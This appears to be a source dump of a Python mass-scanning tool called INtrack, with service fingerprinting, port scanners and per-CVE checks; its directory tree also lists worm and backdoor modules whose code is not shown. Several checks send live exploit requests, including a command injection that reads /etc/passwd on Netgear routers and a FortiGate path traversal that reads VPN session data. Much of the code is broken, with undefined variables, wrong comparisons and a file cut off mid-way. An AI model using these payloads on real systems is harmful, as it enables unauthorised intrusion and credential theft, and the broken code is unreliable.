├── intrack
    ├── __init__.py
    ├── lib
    │   ├── __init__.py
    │   ├── check
    │   ├── vulns
    │   │   ├── cisco
    │   │   │   ├── __init__.py
    │   │   │   ├── CVE_2019_1653.py
    │   │   │   ├── CVE_2019_2000.py
    │   │   │   ├── CVE_2022_20842.py
    │   │   │   ├── CVE_2021_1445.py
    │   │   │   ├── CVE_2020_3452.py
    │   │   │   └── CVE_2020_3259.py
    │   │   ├── dahua
    │   │   │   ├── __init__.py
    │   │   │   └── CVE_2017_7925.py
    │   │   ├── f5bigip
    │   │   │   ├── __init__.py
    │   │   │   ├── CVE_2022_1388.py
    │   │   │   └── CVE_2021_22986.py
    │   │   ├── fortinet
    │   │   │   ├── __init__.py
    │   │   │   ├── CVE_2018_13379.py
    │   │   │   └── CVE_2022_40684.py
    │   │   ├── joomla
    │   │   │   ├── __init__.py
    │   │   │   └── CVE_2023_23752.py
    │   │   ├── ncast
    │   │   │   ├── __init__.py
    │   │   │   └── CVE_2024_0305.py
    │   │   ├── netgear
    │   │   │   ├── __init__.py
    │   │   │   └── CVE_2016_6277.py
    │   │   ├── thinkphp
    │   │   │   ├── __init__.py
    │   │   │   └── CVE_2022_47945.py
    │   │   ├── zabbix
    │   │   │   ├── __init__.py
    │   │   │   └── CVE_2019_17382.py
    │   │   ├── hikvision
    │   │   │   ├── __init__.py
    │   │   │   ├── CVE_2017_7921.py
    │   │   │   └── CVE_2021_36260.py
    │   │   ├── microsoft
    │   │   │   ├── __init__.py
    │   │   │   ├── CVE_2015_1635.py
    │   │   │   ├── CVE_2021_34473.py
    │   │   │   ├── CVE_2017_7269.py
    │   │   │   └── CVE_2021_38647.py
    │   │   ├── wordpress
    │   │   │   ├── __init__.py
    │   │   │   └── CVE_2017_5487.py
    │   │   └── __init__.py
    │   ├── worms
    │   │   ├── netscan.sh
    │   │   ├── __init__.py
    │   │   ├── hadoop_worm.py
    │   │   ├── worm.sh
    │   │   ├── microsoft_worm.py
    │   │   ├── vscode_sftp_worm.py
    │   │   └── tomcat_worm.py
    │   ├── headers
    │   │   ├── __init__.py
    │   │   └── headers_handler.py
    │   ├── workflows
    │   │   ├── __init__.py
    │   │   └── microsoft_workflow.py
    │   ├── miscellaneous
    │   │   ├── __init__.py
    │   │   ├── web_form.py
    │   │   └── dir_listing.py
    │   ├── network
    │   │   ├── network_handler.py
    │   │   ├── __init__.py
    │   │   ├── rdp_scanner.py
    │   │   ├── port_scanner.py
    │   │   ├── telnet_scanner.py
    │   │   ├── adb_misconfig.py
    │   │   └── rtsp_mangler.py
    │   ├── hostname_handler.py
    │   ├── http_handler.py
    │   ├── async_handler.py
    │   ├── backdoors
    │   │   ├── __init__.py
    │   │   ├── antsword_backdoor.py
    │   │   ├── mikrotik_backdoor.py
    │   │   ├── fatpipe_backdoor.py
    │   │   ├── webshell_backdoor.py
    │   │   ├── dlink_backdoor.py
    │   │   ├── php_backdoor.py
    │   │   └── cisco_backdoor.py
    │   ├── exposures
    │   │   ├── __init__.py
    │   │   ├── sitemap_scanner.py
    │   │   ├── security_scanner.py
    │   │   ├── robots_scanner.py
    │   │   ├── api_docs_scanner.py
    │   │   ├── security_headers.py
    │   │   └── sensitive_endpoint_scanner.py
    │   ├── iot
    │   │   ├── __init__.py
    │   │   ├── network_camera.py
    │   │   ├── epmp_scanner.py
    │   │   ├── gargoyle_scanner.py
    │   │   ├── netgear_scanner.py
    │   │   ├── gpon_scanner.py
    │   │   ├── routeros_scanner.py
    │   │   ├── cisco_scanner.py
    │   │   ├── webcamxp_scanner.py
    │   │   └── hikvision_scanner.py
    │   ├── color_handler.py
    │   └── instances
    │   │   ├── jira.py
    │   │   ├── zimbra.py
    │   │   ├── ncast.py
    │   │   ├── microsoft_exchange.py
    │   │   ├── webdav_scanner.py
    │   │   ├── apache.py
    │   │   ├── __init__.py
    │   │   ├── weblogic_scanner.py
    │   │   ├── webmin_scanner.py
    │   │   ├── moveit.py
    │   │   ├── drupal.py
    │   │   ├── joomla.py
    │   │   ├── thinkphp.py
    │   │   ├── server_scanner.py
    │   │   ├── php.py
    │   │   ├── demo.py
    │   │   ├── nginx.py
    │   │   ├── bigip_scanner.py
    │   │   ├── wordpress_scanner.py
    │   │   └── microsoft_iis.py
    ├── common-http-ports.txt
    └── main.py
├── docs
    └── logo.png
├── MANIFEST.in
├── requirements.txt
├── .gitignore
├── pyproject.toml
└── README.md


/intrack/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/check:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/cisco/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/dahua/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/f5bigip/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/fortinet/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/joomla/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/ncast/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/netgear/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/thinkphp/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/zabbix/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/hikvision/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/microsoft/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/wordpress/__init__.py:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/intrack/lib/worms/netscan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash


--------------------------------------------------------------------------------
/docs/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/K3ysTr0K3R/INtrack/HEAD/docs/logo.png


--------------------------------------------------------------------------------
/MANIFEST.in:
--------------------------------------------------------------------------------
1 | recursive-include intrack *
2 | include README.md
3 | include requirements.txt
4 | 


--------------------------------------------------------------------------------
/intrack/lib/headers/__init__.py:
--------------------------------------------------------------------------------
1 | from .headers_handler import *
2 | 
3 | __all__ = ["headers_handler"]
4 | 


--------------------------------------------------------------------------------
/intrack/lib/workflows/__init__.py:
--------------------------------------------------------------------------------
1 | from .microsoft_workflow import check_microsoft_workflow
2 | 
3 | __all__ = ["check_microsoft_workflow"]
4 | 


--------------------------------------------------------------------------------
/intrack/lib/miscellaneous/__init__.py:
--------------------------------------------------------------------------------
1 | from .dir_listing import check_dir_listing
2 | from .web_form import *
3 | 
4 | __all__ = ["check_dir_listing"]
5 | 


--------------------------------------------------------------------------------
/intrack/lib/network/network_handler.py:
--------------------------------------------------------------------------------
1 | import netaddr
2 | 
3 | def get_ips_from_subnet(subnet_range):
4 |     subnet = netaddr.IPNetwork(subnet_range)
5 |     return [str(ip) for ip in subnet]


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
 1 | alive_progress==3.1.5
 2 | mmh3==4.1.0
 3 | netaddr==0.8.0
 4 | paramiko==3.4.0
 5 | paramiko_ng==2.8.10
 6 | Requests==2.32.3
 7 | rich==13.9.4
 8 | rich_click==1.6.1
 9 | urllib3==1.26.5
10 | 


--------------------------------------------------------------------------------
/intrack/lib/hostname_handler.py:
--------------------------------------------------------------------------------
1 | import socket
2 | 
3 | def get_hostname(ip: str) -> str | None:
4 |     try:
5 |         return socket.gethostbyaddr(ip)[0]
6 |     except (socket.herror, socket.gaierror, TimeoutError):
7 |         return None
8 | 


--------------------------------------------------------------------------------
/intrack/lib/miscellaneous/web_form.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import requests
 3 | 
 4 | def find_web_form(ip, ports=None, timeout=5):
 5 | 	detect_form = [
 6 | 	"""
 7 | 	<form 
 8 | 	</form> 
 9 | 	<button
10 | 	"""
11 | 	]
12 | 
13 | 	detect_file_upload = []
14 | 
15 | 	for lists in array:
16 | 		trip = lists.strip()
17 | 		print(trip)


--------------------------------------------------------------------------------
/intrack/common-http-ports.txt:
--------------------------------------------------------------------------------
 1 | 66
 2 | 80
 3 | 81
 4 | 443
 5 | 445
 6 | 457
 7 | 1080
 8 | 1100
 9 | 1241
10 | 1352
11 | 1433
12 | 1434
13 | 1521
14 | 1944
15 | 2301
16 | 3000
17 | 3128
18 | 3306
19 | 4000
20 | 4001
21 | 4002
22 | 4100
23 | 5000
24 | 5432
25 | 5800
26 | 5801
27 | 5802
28 | 6346
29 | 6347
30 | 7001
31 | 7002
32 | 8000
33 | 8080
34 | 8443
35 | 8888
36 | 30821
37 | 


--------------------------------------------------------------------------------
/intrack/lib/http_handler.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | def http_https(ip: str, timeout: int = 5) -> dict | None:
 4 |     for scheme in ("https", "http"):
 5 |         try:
 6 |             requests.get(f"{scheme}://{ip}", timeout=timeout, verify=False)
 7 |             return {"protocol": scheme}
 8 |         except requests.RequestException:
 9 |             continue
10 |     return None
11 | 


--------------------------------------------------------------------------------
/intrack/lib/worms/__init__.py:
--------------------------------------------------------------------------------
 1 | from .vscode_sftp_worm import crawl_vscode_sftp
 2 | from .microsoft_worm import microsoft_worm
 3 | from .tomcat_worm import exploit_CVE_2017_12615_CVE_2017_12617
 4 | from .hadoop_worm import hadoop_worm
 5 | 
 6 | __all__ = [
 7 |     "crawl_vscode_sftp",
 8 |     "microsoft_worm",
 9 |     "exploit_CVE_2017_12615_CVE_2017_12617",
10 |     "hadoop_worm"
11 | ]
12 | 


--------------------------------------------------------------------------------
/intrack/lib/async_handler.py:
--------------------------------------------------------------------------------
 1 | import asyncio
 2 | 
 3 | class AsyncHandler:
 4 |     def __init__(self, concurrency=10):
 5 |         self.semaphore = asyncio.Semaphore(concurrency)
 6 | 
 7 |     async def run_task(self, task_func, *args, **kwargs):
 8 |         async with self.semaphore:
 9 |             return await task_func(*args, **kwargs)
10 | 
11 |     async def run_tasks(self, tasks):
12 |         return await asyncio.gather(*tasks)


--------------------------------------------------------------------------------
/intrack/lib/network/__init__.py:
--------------------------------------------------------------------------------
 1 | from .adb_misconfig import check_adb
 2 | from .network_handler import get_ips_from_subnet
 3 | from .port_scanner import port_scanner
 4 | from .rdp_scanner import scan_rdp
 5 | from .rtsp_mangler import rtsp_checks
 6 | from .telnet_scanner import scan_telnet
 7 | 
 8 | __all__ = [
 9 |     "check_adb", 
10 |     "get_ips_from_subnet", 
11 |     "port_scanner",
12 |     "scan_rdp", 
13 |     "rtsp_checks", 
14 |     "scan_telnet"
15 | ]
16 | 


--------------------------------------------------------------------------------
/intrack/lib/backdoors/__init__.py:
--------------------------------------------------------------------------------
 1 | from .antsword_backdoor import *
 2 | from .cisco_backdoor import *
 3 | from .dlink_backdoor import *
 4 | from .fatpipe_backdoor import *
 5 | from .mikrotik_backdoor import *
 6 | from .php_backdoor import *
 7 | from .webshell_backdoor import *
 8 | 
 9 | __all__ = [
10 |     "antsword_backdoor", 
11 |     "cisco_backdoor", 
12 |     "dlink_backdoor",
13 |     "fatpipe_backdoor", 
14 |     "mikrotik_backdoor", 
15 |     "php_backdoor", 
16 |     "webshell_backdoor"
17 | ]
18 | 


--------------------------------------------------------------------------------
/intrack/lib/network/rdp_scanner.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | from concurrent.futures import ThreadPoolExecutor
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def scan_rdp(ip, port=None, timeout=10):
 6 |     try:
 7 |         with socket.create_connection((ip, port), timeout=timeout) as sock:
 8 |             print_colour(f"[+] {ip}:{port}")
 9 |             return True
10 |     except (socket.timeout, ConnectionRefusedError):
11 |         return False
12 |     except Exception:
13 |         return False


--------------------------------------------------------------------------------
/intrack/lib/exposures/__init__.py:
--------------------------------------------------------------------------------
 1 | from .api_docs_scanner import check_api_docs
 2 | from .robots_scanner import check_robots
 3 | from .security_headers import check_security_headers
 4 | from .security_scanner import check_security
 5 | from .sensitive_endpoint_scanner import check_sensitive_endpoints
 6 | from .sitemap_scanner import check_sitemap
 7 | 
 8 | __all__ = [
 9 |     "check_api_docs",
10 |     "check_robots",
11 |     "check_security_headers",
12 |     "check_security",
13 |     "check_sensitive_endpoints",
14 |     "check_sitemap"
15 | ]
16 | 


--------------------------------------------------------------------------------
/intrack/lib/headers/headers_handler.py:
--------------------------------------------------------------------------------
 1 | import random
 2 | from pathlib import Path
 3 | 
 4 | def load_user_agents():
 5 |     user_agents_path = Path(__file__).resolve().parent / "user_agents.txt"
 6 |     with open(user_agents_path, "r", encoding="utf-8") as file:
 7 |         return [line.strip() for line in file]
 8 | 
 9 | def user_agents():
10 |     user_agent_list = load_user_agents()
11 |     user_agent = random.choice(user_agent_list)
12 |     sanitized_user_agent = user_agent.encode('ascii', errors='ignore').decode('ascii')
13 |     return sanitized_user_agent
14 | 


--------------------------------------------------------------------------------
/intrack/lib/network/port_scanner.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | from intrack.lib.color_handler import print_colour
 3 | 
 4 | def port_scanner(ip, ports=None):
 5 |     if ports is None:
 6 |         ports = range(1, 65536)
 7 | 
 8 |     for port in ports:
 9 |         try:
10 |             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11 |             sock.settimeout(10)
12 |             result = sock.connect_ex((ip, port))
13 |             if result == 0:
14 |                 print_colour(f"[+] {ip}:{port}")
15 |         except socket.error as err:
16 |             continue
17 |         finally:
18 |             sock.close()


--------------------------------------------------------------------------------
/intrack/lib/workflows/microsoft_workflow.py:
--------------------------------------------------------------------------------
 1 | from intrack.lib.instances.microsoft_iis import check_microsoft_iis
 2 | from intrack.lib.vulns.microsoft.CVE_2017_7269 import check_CVE_2017_7269
 3 | from intrack.lib.vulns.microsoft.CVE_2021_38647 import check_CVE_2021_38647
 4 | from intrack.lib.vulns.microsoft.CVE_2021_34473 import check_CVE_2021_34473
 5 | 
 6 | def check_microsoft_workflow(ip, open_ports):
 7 | 	if check_microsoft_iis(ip, open_ports):
 8 | 		check_microsoft_iis(ip, open_ports)
 9 | 		print(f"Running Windows vuln scans on {ip}")
10 | 		check_CVE_2017_7269(ip, open_ports)
11 | 		check_CVE_2021_38647(ip, open_ports)
12 | 		check_CVE_2021_34473(ip, open_ports)
13 | 


--------------------------------------------------------------------------------
/intrack/lib/iot/__init__.py:
--------------------------------------------------------------------------------
 1 | from .gargoyle_scanner import check_gargoyle
 2 | from .gpon_scanner import check_gpon
 3 | from .webcamxp_scanner import check_webcamxp
 4 | from .netgear_scanner import scan_netgear
 5 | from .hikvision_scanner import check_hikvision
 6 | from .cisco_scanner import check_cisco
 7 | from .epmp_scanner import check_epmp
 8 | from .network_camera import check_network_camera
 9 | from .routeros_scanner import mikrotik_router
10 | 
11 | __all__ = [
12 |     "check_gargoyle",
13 |     "check_gpon",
14 |     "check_webcamxp",
15 |     "scan_netgear",
16 |     "check_hikvision",
17 |     "check_cisco",
18 |     "check_epmp",
19 |     "check_network_camera",
20 |     "mikrotik_router"
21 | ]
22 | 


--------------------------------------------------------------------------------
/intrack/lib/iot/network_camera.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_network_camera(ip, ports=None, timeout=5):
 6 | 	protocols = ["http", "https"]
 7 | 	if ports is None:
 8 | 		ports = [80]
 9 | 	else:
10 | 		ports = [f":{port}" for port in ports]
11 | 	for protocol in protocols:
12 | 		for port in ports:
13 | 			url = f"{protocol}://{ip}{port}/CgiStart?page=Single"
14 | 			try:
15 | 				response = requests.get(url, verify=False, headers=headers, timeout=timeout)
16 | 				if "<TITLE>Network Camera</TITLE>" in response.text:
17 | 					print_colour(f"Network Camera detected: {url}")
18 | 					return True
19 | 			except requests.RequestException:
20 | 				continue
21 | 	return False


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Python bytecode
 2 | __pycache__/
 3 | *.py[cod]
 4 | *.pyo
 5 | *.pyd
 6 | *.pyo
 7 | *.pwc
 8 | 
 9 | # C extensions
10 | *.so
11 | 
12 | # Distribution / packaging
13 | .Python
14 | build/
15 | develop-eggs/
16 | dist/
17 | downloads/
18 | eggs/
19 | .eggs/
20 | lib64/
21 | parts/
22 | sdist/
23 | *.egg-info/
24 | .installed.cfg
25 | *.egg
26 | MANIFEST
27 | 
28 | # Installer logs
29 | pip-log.txt
30 | pip-delete-this-directory.txt
31 | 
32 | # Environnements virtuels
33 | env/
34 | venv/
35 | .venv/
36 | env.bak/
37 | venv.bak/
38 | .mypy_cache/
39 | .pytest_cache/
40 | 
41 | # Editor / IDE
42 | *.swp
43 | .idea/
44 | .vscode/
45 | 
46 | # Pyre type checker
47 | .pyre/
48 | 
49 | # Coverage reports
50 | .coverage
51 | htmlcov/
52 | .coverage.*
53 | 
54 | # Jupyter Notebook checkpoints
55 | .ipynb_checkpoints/
56 | 


--------------------------------------------------------------------------------
/intrack/lib/color_handler.py:
--------------------------------------------------------------------------------
 1 | from rich.console import Console
 2 | from rich.text import Text
 3 | 
 4 | console = Console()
 5 | 
 6 | STYLES = {
 7 |     "[*]": "bold bright_blue",
 8 |     "[+]": "bold bright_green",
 9 |     "[-]": "bold bright_red",
10 |     "[!]": "bold bright_yellow"
11 | }
12 | 
13 | def print_colour(message: str):
14 |     prefix = next((p for p in STYLES if message.startswith(p)), "")
15 |     style = STYLES.get(prefix, "default")
16 |     symbol = Text(prefix + " ", style=style) if prefix else Text("")
17 | 
18 |     content = message[len(prefix):].strip()
19 |     styled = [
20 |         Text(word, style="bold bright_cyan" if '.' in word and any(c.isdigit() for c in word) else "default")
21 |         for word in content.split()
22 |     ]
23 | 
24 |     console.print(symbol + Text(" ").join(styled))
25 | 


--------------------------------------------------------------------------------
/intrack/lib/instances/jira.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_jira(ip, ports=None, timeout=5):
 6 | 	paths = ["/secure/Dashboard.jspa", "/jira/secure/Dashboard.jspa", "/login.jsp"]
 7 | 	protocols = ["http", "https"]
 8 | 	if ports is None:
 9 | 		ports = [80]
10 | 	else:
11 | 		ports = [f":{port}" for port in ports]
12 | 	for protocol in protocols:
13 | 		for path in paths:
14 | 			url = f"{protocol}://{ip}{port}{path}"
15 | 			try:
16 | 				response = requests.get(url, verify=False, timeout=timeout, headers=headers)
17 | 				if "Project Management Software" in response.text:
18 | 					print_colour(f"Jira detected: {url}")
19 | 					return True
20 | 			except requests.RequestException:
21 | 				continue
22 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/iot/epmp_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_epmp(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 |     for protocol in protocols:
13 |         url = f"{protocol}://{ip}{port}"
14 |         try:
15 |             response = requests.get(url, timeout=timeout, verify=False, headers=headers)
16 |             if "<title>ePMP</title>" in response.text:
17 |                 print_colour(f"ePMP detected: {url}")
18 |                 return True
19 |         except requests.RequestException:
20 |             continue
21 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/cisco/CVE_2019_1653.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2019_1653(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	path = "/cgi-bin/config.exp"
 8 | 	protocols = ["http", "https"]
 9 | 	if ports is None:
10 | 		ports = [80]
11 | 	else:
12 | 		ports = [f":{port}" for port in ports]
13 | 	for protocol in protocols:
14 | 		for port in ports:
15 | 			url = f"{protocol}://{ip}{port}{path}"
16 | 			try:
17 | 				response = requests.get(url, verify=False, timeout=timeout, headers=headers)
18 | 				if "sysconfig" in response.text:
19 | 					print_colour(f"The target is vulnerable to CVE-2019-1653 : {url}")
20 | 					return True
21 | 			except requests.RequestException:
22 | 				continue
23 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/instances/zimbra.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_zimbra(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	path = "/js/zimbraMail/share/model/ZmSettings.js"
 8 | 	protocols = ["http", "https"]
 9 | 	if ports is None:
10 | 		ports = [80]
11 | 	else:
12 | 		ports = [f":{port}" for port in ports]
13 | 	for protocol in protocols:
14 | 		for port in ports:
15 | 			url = f"{protocol}://{ip}{port}{path}"
16 | 			try:
17 | 				response = requests.get(url, verify=False, timeout=timeout, headers=headers)
18 | 				if "Zimbra Collaboration Suite Web Client" in response.text:
19 | 					print_colour(f"Zimbra detected: {url}")
20 | 					return True
21 | 			except requests.RequestException:
22 | 				continue
23 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/instances/ncast.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_ncast(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 |     for protocol in protocols:
13 |         for port in ports:
14 |             url = f"{protocol}://{ip}{port}"
15 |             try:
16 |                 response = requests.get(url, verify=False, timeout=timeout, headers=headers)
17 |                 if "Ncast" in response.text:
18 |                     print_colour(f"Ncast detected: {url}")
19 |                     return True
20 |             except requests.RequestException:
21 |                 continue
22 |     return False


--------------------------------------------------------------------------------
/intrack/lib/exposures/sitemap_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests 
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_sitemap(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	paths = ["/sitemap.xml", "/sitemap.xsl", "/sitemap.xsd"]
 8 | 	protocols = ["http", "https"]
 9 | 	if ports is None:
10 | 		ports = [80]
11 | 	else:
12 | 		ports = [f":{port}" for port in ports]
13 | 	for port in ports:
14 | 		for protocol in protocols:
15 | 			for path in paths:
16 | 				url = f"{protocol}://{ip}{port}{path}"
17 | 				try:
18 | 					response = requests.get(url, verify=False, timeout=timeout, headers=headers)
19 | 					if "sitemap>" in response.text:
20 | 						print_colour(f"[+] Sitemap file found: {url}")
21 | 						return True
22 | 				except requests.RequestException:
23 | 					continue
24 | 	return False
25 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/netgear/CVE_2016_6277.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2016_6277(ip, ports=None, timeout=5):
 6 | 	protocols = ["http", "https"]
 7 | 	if ports is None:
 8 | 		ports = [80]
 9 | 	else:
10 | 		ports = [f":{port}" for port in ports]
11 | 
12 | 	for protocol in protocols:
13 | 		for port in ports:
14 | 			url = f"{protocol}://{ip}{port}/cgi-bin/;cat$IFS/etc/passwd"
15 | 			headers = {
16 | 				'User-Agent': user_agents()
17 | 			}
18 | 			try:
19 | 				response = requests.get(url, headers=headers, timeout=timeout, verify=False)
20 | 				if "root:" in response.text and response.status_code == "200":
21 | 					print_colour(f"The target is vulnerable to CVE-2016-6277 : {url}")
22 | 					return True
23 | 			except requests.RequestException:
24 | 				continue 
25 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/miscellaneous/dir_listing.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_dir_listing(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	matchers = ["Directory listing for ", "Index of /", "[To Parent Directory]", "Directory: /"]
 8 | 	protocols = ["http", "https"]
 9 | 	if ports is None:
10 | 		ports = [80]
11 | 	else:
12 | 		ports = [f":{port}" for port in ports]
13 | 	for protocol in protocols:
14 | 		for port in ports:
15 | 			url = f"{protocol}://{ip}{port}"
16 | 			try:
17 | 				response = requests.get(url, verify=False, timeout=timeout, headers=headers)
18 | 				if any(matcher in response.text for matcher in matchers):
19 | 					print_colour(f"Directory listing found: {url}")
20 | 					return True
21 | 			except requests.RequestException:
22 | 				continue
23 | 	return False
24 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/fortinet/CVE_2018_13379.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2018_13379(ip, ports=False, timeout=5):
 6 | 	protocols = ["http", "https"]
 7 | 	if ports is None:
 8 | 		ports = [80]
 9 | 	else:
10 | 		ports = [f":{port}" for port in ports]
11 | 	for protocol in protocols:
12 | 		for port in ports:
13 | 			url = f"{protocol}://{ip}{port}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
14 | 			headers = {
15 | 			    'User-Agent': user_agents()
16 | 			}
17 | 			try:
18 | 				response = requests.get(url, headers=headers, timeout=timeout, verify=False)
19 | 				if "^var fgt_lang =" in response.text:
20 | 					print_colour(f"The target is vulnerable to CVE-2018-13379 : {url}")
21 | 					return True
22 | 			except requests.RequestException:
23 | 				continue
24 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/fortinet/CVE_2022_40684.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2022_40684(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	path = "/api/v2/cmdb/system/admin"
 8 | 	macthers = ["ENC XXXX", "http_method"]
 9 | 	protocol = ["http", "https"]
10 | 	if ports is None:
11 | 		ports = [80]
12 | 	else:
13 | 		ports = [f":{port}" for port in ports]
14 | 	for protocol in protocols:
15 | 		for port in ports:
16 | 			url = f"{protocol}://{ip}{port}{path}"
17 | 			try:
18 | 				response = requests.get(url, verify=False, timeout=timeout, headers=headers)
19 | 				if any(matcher in response.text for matcher in matchers):
20 | 					print_colour(f"The target is vulnerable to CVE-2022-40684 : {url}")
21 | 					return True
22 | 			except requests.RequestException:
23 | 				continue
24 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/instances/microsoft_exchange.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.color_handler import print_colour
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | 
 5 | def check_exchange(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	matchers = ['Outlook', '<title>Exchange Log In</title>', '<title>Microsoft Exchange - Outlook Web Access</title>']
 8 | 	protocols = ["http", "https"]
 9 | 	if ports is None:
10 | 		ports = [80]
11 | 	else:
12 | 		ports = [f":{port}" for port in ports]
13 | 
14 | 	for protocol in protocols:
15 | 		for port in ports:
16 | 			url = f"{protocol}://{ip}{port}/owa/auth/logon.aspx"
17 | 			try:
18 | 				response = requests.get(url, verify=False, timeout=timeout, headers=headers)
19 | 				if any(matcher in response.text for matcher in matchers):
20 | 					print_colour(f"Microsoft Exchange: {url}")
21 | 					return True
22 | 			except requests.RequestException:
23 | 				continue
24 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/instances/webdav_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_webdav(ip, ports=None, timeout=5):
 6 | 	headers = {"User-Agent": user_agents()}
 7 | 	webdav_methods = {'PROPFIND', 'MKCOL', 'MOVE', 'COPY'}
 8 | 	protocols = ["http", "https"]
 9 | 	if ports is None:
10 | 		ports = [80]
11 | 	else:
12 | 		ports = [f":{port}" for port in ports]
13 | 
14 | 	for protocol in protocols:
15 | 		for port in ports:
16 | 			url = f"{protocol}://{ip}{port}"
17 | 			try:
18 | 				response = requests.options(url, timeout=timeout, verify=False, headers=headers)
19 | 				allowed_methods = response.headers.get('Allow', '')
20 | 				if any(method in allowed_methods for method in webdav_methods):
21 | 					print_colour(f"[+] {url} - WebDAV detected on target")
22 | 					return True
23 | 			except requests.RequestException:
24 | 				continue
25 | 	return False
26 | 


--------------------------------------------------------------------------------
/intrack/lib/instances/apache.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_apache(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
